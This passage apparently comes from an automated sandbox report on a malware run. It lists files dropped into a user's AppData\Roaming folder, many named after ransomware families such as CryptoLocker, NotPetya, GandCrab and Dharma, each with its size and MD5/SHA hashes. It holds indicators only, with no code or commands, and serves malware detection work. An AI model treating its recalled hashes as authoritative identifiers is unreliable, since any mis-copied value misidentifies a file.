
                                                                                                                                                                                                                          b6c78677b83c0a5b02f48648a9b8e86d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0d90c40d2e9e8c58c1dafb528d6eab45e15fda81

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          706fce69fea67622b03fafb51ece076c1fdd38892318f8cce9f2ec80aabca822

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          302acca8c5dd310f86b65104f7accd290014e38d354e97e4ffafe1702b0a13b90e4823c274b51bcc9285419e69ff7111343ac0a64fd3c8b67c48d7bbd382337b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cerber5.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          313KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          fe1bc60a95b2c2d77cd5d232296a7fa4

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c07dfdea8da2da5bad036e7c2f5d37582e1cf684

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ChilledWindows.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.4MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6a4853cd0584dc90067e15afb43c4962

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          ae59bbb123e98dc8379d08887f83d7e52b1b47fc

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ccb9502bf8ba5becf8b758ca04a5625c30b79e2d10d2677cc43ae4253e1288ec

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          feb223e0de9bd64e32dc4f3227e175b58196b5e614bca8c2df0bbca2442a564e39d66bcd465154149dc7ebbd3e1ca644ed09d9a9174b52236c76e7388cb9d996

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\CookieClickerHack.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          68KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bc1e7d033a999c4fd006109c24599f4d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b927f0fc4a4232a023312198b33272e1a6d79cec

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          13adae722719839af8102f98730f3af1c5a56b58069bfce8995acd2123628401

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f5d9b8c1fd9239894ec9c075542bff0bcef79871f31038e627ae257b8c1db9070f4d124448a78e60ccc8bc12f138102a54825e9d7647cd34832984c7c24a6276

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\CoronaVirus.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          055d1462f66a350d9886542d4d79bc2b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f1086d2f667d807dbb1aa362a7a809ea119f2565

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\CrazyNCS.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          122KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d043ba91e42e0d9a68c9866f002e8a21

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e9f177e1c57db0a15d1dc6b3e6c866d38d85b17c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          6820c71df417e434c5ad26438c901c780fc5a80b28a466821b47d20b8424ef08

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3e9783646e652e9482b3e7648fb0a5f7c8b6c386bbc373d5670d750f6f99f6137b5501e21332411609cbcc0c20f829ab8705c2835e2756455f6754c9975ac6bd

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\CryptoLocker.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          338KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          04fb36199787f2e3e2135611a38321eb

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          65559245709fe98052eb284577f1fd61c01ad20d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          533d6603f6e2a77bd1b2c6591a135c4717753d53317c1be06e43774e896d9543bcd0ea6904a0688aa84b2d8424641d68994b1e7dc4aa46d66c36feecb6145444

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\CryptoWall.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          132KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          919034c8efb9678f96b47a20fa6199f2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          747070c74d0400cffeb28fbea17b64297f14cfbd

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e036d68b8f8b7afc6c8b6252876e1e290f11a26d4ad18ac6f310662845b2c734

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          745a81c50bbfd62234edb9788c83a22e0588c5d25c00881901923a02d7096c71ef5f0cd5b73f92ad974e5174de064b0c5ea8044509039aab14b2aed83735a7c4

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Curfun.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          138KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0b3b2dff5503cb032acd11d232a3af55

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6efc31c1d67f70cf77c319199ac39f70d5a7fa95

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ef878461a149024f3065121ff4e165731ecabef1b94b0b3ed2eda010ad39202b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          484014d65875e706f7e5e5f54c2045d620e5cce5979bf7f37b45c613e6d948719c0b8e466df5d8908706133ce4c4b71a11b804417831c9dbaf72b6854231ea17

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\DeriaLock.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          484KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0a7b70efba0aa93d4bc0857b87ac2fcb

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          01a6c963b2f5f36ff21a1043587dcf921ae5f5cd

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          4f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2033f9637b8d023242c93f54c140dd561592a3380a15a9fdc8ebfa33385ff4fc569d66c846a01b4ac005f0521b3c219e87f4b1ed2a83557f9d95fa066ad25e14

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\DesktopBoom.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f0a661d33aac3a3ce0c38c89bec52f89

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          709d6465793675208f22f779f9e070ed31d81e61

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c20e78ce9028299d566684d35b1230d055e5ea0e9b94d0aff58f650e0468778a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          57cdb3c38f2e90d03e6dc1f9d8d1131d40d3919f390bb1783343c82465461319e70483dc3cd3efdbd9a62dfc88d74fc706f05d760ffd8506b16fd7686e414443

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Dharma.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          11.5MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          928e37519022745490d1af1ce6f336f7

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b7840242393013f2c4c136ac7407e332be075702

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Fantom.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          261KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7d80230df68ccba871815d68f016c282

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e10874c6108a26ceedfc84f50881824462b5b6b6

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          64d02b3e7ed82a64aaac1f74c34d6b6e6feaac665ca9c08911b93eddcec66595687024ec576e74ea09a1193ace3923969c75de8733859835fef45335cf265540

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Flasher.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          246KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          9254ca1da9ff8ad492ca5fa06ca181c6

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          70fa62e6232eae52467d29cf1c1dacb8a7aeab90

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\GandCrab.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          291KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e6b43b1028b6000009253344632e69c4

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e536b70e3ffe309f7ae59918da471d7bf4cadd1c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          bfb9db791b8250ffa8ebc48295c5dbbca757a5ed3bbb01de12a871b5cd9afd5a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          07da214314673407a7d3978ee6e1d20bf1e02f135bf557e86b50489ecc146014f2534515c1b613dba96e65489d8c82caaa8ed2e647684d61e5e86bd3e8251adf

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Hydra.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          43KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b2eca909a91e1946457a0b36eaf90930

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          3200c4e4d0d4ece2b2aadb6939be59b91954bcfa

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\InfinityCrypt.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          211KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b805db8f6a84475ef76b795b0d1ed6ae

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          7711cb4873e58b7adcf2a2b047b090e78d10c75b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Krotten.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          53KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          87ccd6f4ec0e6b706d65550f90b0e3c7

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          213e6624bff6064c016b9cdc15d5365823c01f5f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e79f164ccc75a5d5c032b4c5a96d6ad7604faffb28afe77bc29b9173fa3543e4

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          a72403d462e2e2e181dbdabfcc02889f001387943571391befed491aaecba830b0869bdd4d82bca137bd4061bbbfb692871b1b4622c4a7d9f16792c60999c990

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Launcher.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          197KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7506eb94c661522aff09a5c96d6f182b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          329bbdb1f877942d55b53b1d48db56a458eb2310

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d5b962dfe37671b5134f0b741a662610b568c2b5374010ee92b5b7857d87872c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          d815a9391ef3d508b89fc221506b95f4c92d586ec38f26aec0f239750f34cf398eed3d818fa439f6aa6ed3b30f555a1903d93eeeec133b80849a4aa6685ec070

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Locky.AZ.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          181KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0826df3aaa157edff9c0325f298850c2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          ed35b02fa029f1e724ed65c2de5de6e5c04f7042

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          af6c5734fd02b9ad3f202e95f9ff4368cf0dfdaffe0d9a88b781b196a0a3c44eef3d8f7c329ec6e3cbcd3e6ab7c49df7d715489539e631506ca1ae476007a6a6

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Melting.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          12KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          833619a4c9e8c808f092bf477af62618

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b4a0efa26f790e991cb17542c8e6aeb5030d1ebf

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          92a284981c7ca33f1af45ce61738479fbcbb5a4111f5498e2cb54931c8a36c76

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4f231fc16339d568b5cf9353133aeae835eb262dab68bc80d92f37b43df64dce4fae0e913cbaa3bb61351a759aeecf9d280bc5779b0853c980559a654d6cca11

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Monoxidex86.harmless.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          131KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bd65d387482def1fe00b50406f731763

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d06a2ba2e29228f443f97d1dd3a8da5dd7df5903

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          1ab7375550516d7445c47fd9b551ed864f227401a14ff3f1ff0d70caca3bd997

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          351ecd109c4d49bc822e8ade73a9516c4a531ebcda63546c155e677dcff19708068dc588b2fcf30cad086238e8b206fc5f349d37dda02d3c3a8d9b570d92e4d9

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\NoMoreRansom.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          63210f8f1dde6c40a7f3643ccf0ff313

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          57edd72391d710d71bead504d44389d0462ccec9

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\NotPetya.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          390KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5b7e6e352bacc93f7b80bc968b6ea493

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e686139d5ed8528117ba6ca68fe415e4fb02f2be

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          63545fa195488ff51955f09833332b9660d18f8afb16bdf579134661962e548a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          9d24af0cb00fb8a5e61e9d19cd603b5541a22ae6229c2acf498447e0e7d4145fee25c8ab9d5d5f18f554e6cbf8ca56b7ca3144e726d7dfd64076a42a25b3dfb6

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Popup.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          373KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          9c3e9e30d51489a891513e8a14d931e4

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          4e5a5898389eef8f464dee04a74f3b5c217b7176

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f8f7b5f20ca57c61df6dc8ff49f2f5f90276a378ec17397249fdc099a6e1dcd8

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          bf45677b7dd6c67ad350ec6ecad5bc3f04dea179fae0ff0a695c69f7de919476dd7a69c25b04c8530a35119e4933f4a8c327ed6dcef892b1114dfd7e494a19a7

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\RedBoot.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e0340f456f76993fc047bc715dfdae6a

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d47f6f7e553c4bc44a2fe88c2054de901390b2d7

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          cac10c675d81630eefca49b2ac4cc83f3eb29115ee28a560db4d6c33f70bf24980e48bb48ce20375349736e3e6b23a1ca504b9367917328853fffc5539626bbc

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\RedEye.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.6MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e9e5596b42f209cc058b55edc2737a80

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f30232697b3f54e58af08421da697262c99ec48b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          9ac9f207060c28972ede6284137698ce0769e3695c7ad98ab320605d23362305

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          e542319beb6f81b493ad80985b5f9c759752887dc3940b77520a3569cd5827de2fcae4c2357b7f9794b382192d4c0b125746df5cf08f206d07b2b473b238d0c7

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Rensenware.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          60335edf459643a87168da8ed74c2b60

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          61f3e01174a6557f9c0bfc89ae682d37a7e91e2e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7bf5623f0a10dfa148a35bebd899b7758612f1693d2a9910f716cf15a921a76a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b4e5e4d4f0b4a52243d6756c66b4fe6f4b39e64df7790072046e8a3dadad3a1be30b8689a1bab8257cc35cb4df652888ddf62b4e1fccb33e1bbf1f5416d73efb

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Rokku.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          666KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          97512f4617019c907cd0f88193039e7c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          24cfa261ee30f697e7d1e2215eee1c21eebf4579

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          438888ef36bad1079af79daf152db443b4472c5715a7b3da0ba24cc757c53499

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          cfbb8dd91434f917d507cb919aa7e6b16b7b2056d56185f6ad5b6149e05629325cdb3df907f58bb3f634b17a9989bf5b6d6b81f5396a3a556431742ed742ac4a

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Satana.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          49KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          46bfd4f1d581d7c0121d2b19a005d3df

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5b063298bbd1670b4d39e1baef67f854b8dcba9d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          683a09da219918258c58a7f61f7dc4161a3a7a377cf82a31b840baabfb9a4a96

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b52aa090f689765d099689700be7e18922137e7a860a00113e3f72aa6553e94a870bbb741e52de9617506a236a2a59198fb224fcd128576d76642eec9d715df5

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ScreenScrew.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          111KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e87a04c270f98bb6b5677cc789d1ad1d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8c14cb338e23d4a82f6310d13b36729e543ff0ca

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e03520794f00fb39ef3cfff012f72a5d03c60f89de28dbe69016f6ed151b5338

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8784f4d42908e54ecedfb06b254992c63920f43a27903ccedd336daaeed346db44e1f40e7db971735da707b5b32206be1b1571bc0d6a2d6eb90bbf9d1f69de13

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Seftad.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          86a3a3ce16360e01933d71d0bf1f2c37

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          af54089e3601c742d523b507b3a0793c2b6e60be

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2ebe23ba9897d9c127b9c0a737ba63af8d0bcd76ec866610cc0b5de2f62b87bd

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          65a3571cf5b057d2c3ce101346947679f162018fa5eadf79c5a6af6c0a3bc9b12731ff13f27629b14983ef8bc73fa9782cc0a9e6c44b0ffc2627da754c324d6e

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\SporaRansomware.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          24KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4a4a6d26e6c8a7df0779b00a42240e7b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8072bada086040e07fa46ce8c12bf7c453c0e286

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7ad9ed23a91643b517e82ad5740d24eca16bcae21cfe1c0da78ee80e0d1d3f02

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c7a7b15d8dbf8e8f8346a4dab083bb03565050281683820319906da4d23b97b39e88f841b30fc8bd690c179a8a54870238506ca60c0f533d34ac11850cdc1a95

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Time.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          111KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          9d0d2fcb45b1ff9555711b47e0cd65e5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          958f29a99cbb135c92c5d1cdffb9462be35ee9fd

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          dc476ae39effdd80399b6e36f1fde92c216a5bbdb6b8b2a7ecbe753e91e4c993

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8fd4ce4674cd52a3c925149945a7a50a139302be17f6ee3f30271ebe1aa6d92bcb15a017dca989cd837a5d23cd56eaacc6344dc7730234a4629186976c857ca9

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Trololo.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3.0MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b6d61b516d41e209b207b41d91e3b90d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e50d4b7bf005075cb63d6bd9ad48c92a00ee9444

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          3d0efd55bde5fb7a73817940bac2a901d934b496738b7c5cab7ea0f6228e28fe

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3217fc904e4c71b399dd273786634a6a6c19064a9bf96960df9b3357001c12b9547813412173149f6185eb5d300492d290342ec955a8347c6f9dcac338c136da

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\UIWIX.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          211KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a933a1a402775cfa94b6bee0963f4b46

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          18aa7b02f933c753989ba3d16698a5ee3a4d9420

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          146581f0b3fbe00026ee3ebe68797b0e57f39d1d8aecc99fdc3290e9cfadc4fc

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          d83da3c97ffd78c42f49b7bfb50525e7c964004b4b7d9cba839c0d8bf3a5fe0424be3b3782e33c57debc6b13b5420a3fa096643c8b7376b3accfb1bc4e7d7368

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\USEF8-45KTX-TZTXH-TETXY.KEY

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5a05c2fb0b9ac3f5a6ad7c7fe4e7eb9d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          79f0754ab6f4cace59c6b6ce88eb0ebaa48f3e28

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          6406ecd6f7d5d3e2c468b9c8c07a91759015e9874d2b2e03b69a58575b37d154

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5c68920d3f445383ff2a17bcddcebe4065a8bdd9fa62ca709702d63ecd6ff6f7d943bb228e7bdc9bd6adbe148a050336f082191451796756d237eec95bdd7b3b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Upwoeb\buufu.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          67KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          71ef93bd8b4bd2e5fef66a32428cca4b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c99fb06b463950046e8bdeb94aedaba611fb2fb7

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          6e5ba92ad48e54fea692291b1a1f9424854c0e027fcaf72ca1cc83e244b81ab5

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f8ea9440717ff3dc283f76d1b45ff4015672322d3fffa467ecbfc846d41132366ae994814c3c54ca311e85177b45e4181373cc2479005060d8dff82e71580310

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ViraLock.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          194KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          8803d517ac24b157431d8a462302b400

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786

                                                                                                                                                                                                                          SHA512

